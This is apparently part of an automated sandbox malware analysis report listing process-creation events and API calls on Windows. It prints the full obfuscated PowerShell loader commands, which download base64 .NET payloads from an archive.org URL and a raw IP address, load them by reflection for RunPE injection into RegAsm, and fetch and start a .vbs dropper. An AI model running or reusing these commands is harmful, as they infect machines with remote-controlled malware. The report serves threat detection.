                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03743BD5 pushfd ; retf 3_2_03743BD9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03743BCA pushfd ; retf 3_2_03743BD9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07DC1FB2 push FFFFFF8Bh; iretd 3_2_07DC1FC5
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07DC2506 push esp; iretd 3_2_07DC2515
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07DC2228 push FFFFFF8Bh; iretd 3_2_07DC223B
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07DC21EF push FFFFFF8Bh; iretd 3_2_07DC2202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07DC3009 push FFFFFF8Bh; retf 3_2_07DC301C
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04AE6902 push esi; retf 9_2_04AE6907
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457186 push ecx; ret 11_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045E55D push esi; ret 11_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457AA8 push eax; ret 11_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434EB6 push ecx; ret 11_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW,11_2_00406EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
